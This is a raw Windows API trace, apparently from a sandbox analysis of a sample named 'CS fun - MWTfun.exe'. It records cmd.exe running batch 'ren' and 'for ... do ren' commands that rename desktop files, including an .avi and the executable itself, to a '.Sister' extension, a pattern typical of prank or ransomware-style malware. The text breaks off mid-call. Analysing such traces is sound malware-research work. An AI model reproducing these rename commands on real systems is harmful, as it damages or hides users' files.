[0110.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0110.700] GetFileType (hFile=0x50) returned 0x2 [0110.700] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0110.700] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0110.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0110.837] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0110.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0110.997] GetFileType (hFile=0x50) returned 0x2 [0110.997] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0110.997] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0111.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.142] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8ca7a90*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8ca7a90*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0111.215] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"0kL8UpxhMP3oFa.avi\" \"0kL8UpxhMP3oFa.avi.Sister\" ") returned 50 [0111.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.215] GetFileType (hFile=0x50) returned 0x2 [0111.215] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0111.215] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0111.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.293] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0111.367] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.367] GetFileType (hFile=0x50) returned 0x2 [0111.367] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0111.367] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0111.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.439] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0111.625] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0111.626] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.626] GetFileType (hFile=0x50) returned 0x2 [0111.626] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0111.626] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0111.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.813] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0111.908] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0111.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.908] GetFileType (hFile=0x50) returned 0x2 [0111.908] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0111.908] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.980] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0112.053] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0112.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.053] GetFileType (hFile=0x50) returned 0x2 [0112.053] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0112.053] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0112.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.163] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0112.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.237] GetFileType (hFile=0x50) returned 0x2 [0112.237] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0112.237] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0112.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.307] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8ca7f20*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8ca7f20*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0112.380] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.bat\" ") returned 50 [0112.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.380] GetFileType (hFile=0x50) returned 0x2 [0112.380] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0112.380] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0112.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.451] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0112.525] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0112.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.525] GetFileType (hFile=0x50) returned 0x2 [0112.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0112.526] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.746] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0112.818] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0113.003] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0113.003] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0113.003] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0113.003] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0113.003] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0113.004] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0113.004] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0113.004] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0113.004] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0113.004] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0113.004] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0113.004] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0113.004] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0113.004] ??_V@YAXPEAX@Z () returned 0x1 [0113.007] GetProcessHeap () returned 0x21ed8c70000 [0113.007] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8c7d210 [0113.007] GetProcessHeap () returned 0x21ed8c70000 [0113.008] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d210, Size=0x74) returned 0x21ed8c7d210 [0113.008] GetProcessHeap () returned 0x21ed8c70000 [0113.008] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d210) returned 0x74 [0113.008] GetProcessHeap () returned 0x21ed8c70000 [0113.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed8c7d2a0 [0113.008] GetProcessHeap () returned 0x21ed8c70000 [0113.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8c72720 [0113.008] GetProcessHeap () returned 0x21ed8c70000 [0113.008] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72720, Size=0x74) returned 0x21ed8c72720 [0113.008] GetProcessHeap () returned 0x21ed8c70000 [0113.008] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72720) returned 0x74 [0113.009] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0113.010] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0113.010] GetProcessHeap () returned 0x21ed8c70000 [0113.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cca0 [0113.010] GetProcessHeap () returned 0x21ed8c70000 [0113.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8c7c5c0 [0113.010] _wcsicmp (_String1="0kL8UpxhMP3oFa.avi", _String2=".") returned 2 [0113.010] _wcsicmp (_String1="0kL8UpxhMP3oFa.avi", _String2="..") returned 2 [0113.011] GetFileAttributesW (lpFileName="0kL8UpxhMP3oFa.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\0kl8upxhmp3ofa.avi")) returned 0x20 [0113.011] GetProcessHeap () returned 0x21ed8c70000 [0113.011] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8ca8100 [0113.012] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8ca8110 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0113.012] SetErrorMode (uMode=0x0) returned 0x0 [0113.012] SetErrorMode (uMode=0x1) returned 0x0 [0113.012] GetFullPathNameW (in: lpFileName="0kL8UpxhMP3oFa.avi", nBufferLength=0x7fe7, lpBuffer=0x21ed8eb0900, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\0kL8UpxhMP3oFa.avi", lpFilePart=0xa6cf4fd660*="0kL8UpxhMP3oFa.avi") returned 0x2a [0113.013] SetErrorMode (uMode=0x0) returned 0x1 [0113.013] GetProcessHeap () returned 0x21ed8c70000 [0113.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8c78810 [0113.013] _wcsicmp (_String1="0kL8UpxhMP3oFa.avi", _String2=".") returned 2 [0113.013] _wcsicmp (_String1="0kL8UpxhMP3oFa.avi", _String2="..") returned 2 [0113.013] GetFileAttributesW (lpFileName="0kL8UpxhMP3oFa.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\0kl8upxhmp3ofa.avi")) returned 0x20 [0113.013] ??_V@YAXPEAX@Z () returned 0x1 [0113.013] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0113.013] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0113.013] malloc (_Size=0xffce) returned 0x21ed8ec08e0 [0113.013] ??_V@YAXPEAX@Z () returned 0x21ed8ec08e0 [0113.014] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0kL8UpxhMP3oFa.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\0kl8upxhmp3ofa.avi")) returned 0x20 [0113.014] malloc (_Size=0xffce) returned 0x21ed8ed08c0 [0113.014] ??_V@YAXPEAX@Z () returned 0x21ed8ed08c0 [0113.015] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\0kL8UpxhMP3oFa.avi", fInfoLevelId=0x1, lpFindFileData=0x21ed8c7c5d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8c7c5d0) returned 0x21ed8c7cdc0 [0113.015] GetProcessHeap () returned 0x21ed8c70000 [0113.015] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c787c0, Size=0x10) returned 0x21ed8c787c0 [0113.015] malloc (_Size=0xffce) returned 0x21ed8ee08a0 [0113.016] ??_V@YAXPEAX@Z () returned 0x21ed8ee08a0 [0113.016] ??_V@YAXPEAX@Z () returned 0x1 [0113.017] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\0kL8UpxhMP3oFa.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\0kl8upxhmp3ofa.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\0kL8UpxhMP3oFa.avi.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\0kl8upxhmp3ofa.avi.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0113.074] FindNextFileW (in: hFindFile=0x21ed8c7cdc0, lpFindFileData=0x21ed8c7c5d0 | out: lpFindFileData=0x21ed8c7c5d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f0e7c0, ftCreationTime.dwHighDateTime=0x1d5e81d, ftLastAccessTime.dwLowDateTime=0xb506470, ftLastAccessTime.dwHighDateTime=0x1d5e6fd, ftLastWriteTime.dwLowDateTime=0xb506470, ftLastWriteTime.dwHighDateTime=0x1d5e6fd, nFileSizeHigh=0x0, nFileSizeLow=0x10be7, dwReserved0=0x0, dwReserved1=0x0, cFileName="0kL8UpxhMP3oFa.avi", cAlternateFileName="")) returned 0 [0113.076] GetLastError () returned 0x12 [0113.076] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0113.076] ??_V@YAXPEAX@Z () returned 0x1 [0113.077] ??_V@YAXPEAX@Z () returned 0x1 [0113.078] ??_V@YAXPEAX@Z () returned 0x1 [0113.080] ??_V@YAXPEAX@Z () returned 0x1 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cb80 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7b340, Size=0x16) returned 0x21ed8c95860 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95860) returned 0x16 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95ac0, Size=0x20) returned 0x21ed8c7d330 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8c727b0 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c727b0, Size=0xb2) returned 0x21ed8c727b0 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c727b0) returned 0xb2 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cb80f0 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.083] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cb80f0, Size=0x30) returned 0x21ed8cb80f0 [0113.083] GetProcessHeap () returned 0x21ed8c70000 [0113.084] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cb80f0) returned 0x30 [0113.084] GetProcessHeap () returned 0x21ed8c70000 [0113.084] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cb8130 [0113.084] malloc (_Size=0x1ff9c) returned 0x21ed8ea0920 [0113.088] GetProcessHeap () returned 0x21ed8c70000 [0113.088] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96c40 [0113.088] GetProcessHeap () returned 0x21ed8c70000 [0113.088] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96340 [0113.088] ??_V@YAXPEAX@Z () returned 0x1 [0113.088] malloc (_Size=0x1ff9c) returned 0x21ed8ea0920 [0113.088] GetProcessHeap () returned 0x21ed8c70000 [0113.125] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c964c0 [0113.125] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed8ea0920, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0113.125] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d2e0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0113.125] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0113.125] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d2e0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ca60 [0113.126] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0113.126] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6df92a83, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6df92a83, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d2e0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0113.126] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0113.126] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x21e, dwReserved1=0xd8c7d2e0, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8c7ce20 [0113.126] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0113.127] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0113.127] malloc (_Size=0x1ff9c) returned 0x21ed8ec08d0 [0113.127] ??_V@YAXPEAX@Z () returned 0x21ed8ec08d0 [0113.128] GetProcessHeap () returned 0x21ed8c70000 [0113.128] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8c72880 [0113.128] ??_V@YAXPEAX@Z () returned 0x1 [0113.128] ??_V@YAXPEAX@Z () returned 0x1 [0113.128] GetProcessHeap () returned 0x21ed8c70000 [0113.128] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cb8130, Size=0x490) returned 0x21ed8cb8130 [0113.128] GetProcessHeap () returned 0x21ed8c70000 [0113.128] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cb8130) returned 0x490 [0113.128] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0113.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0113.129] GetFileType (hFile=0x50) returned 0x2 [0113.129] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0113.129] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0113.200] _get_osfhandle (_FileHandle=1) returned 0x50 [0113.200] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0113.284] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0113.284] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0113.284] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0113.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0113.284] GetFileType (hFile=0x50) returned 0x2 [0113.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0113.285] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0113.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0113.362] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0113.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0113.433] GetFileType (hFile=0x50) returned 0x2 [0113.433] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0113.433] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0113.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0113.523] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cb8100*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8cb8100*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0113.978] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0113.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0113.978] GetFileType (hFile=0x50) returned 0x2 [0113.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0113.978] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0114.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0114.056] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0114.135] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0114.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0114.135] GetFileType (hFile=0x50) returned 0x2 [0114.136] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0114.136] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0114.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0114.208] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0114.336] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0114.415] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0114.415] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0114.415] malloc 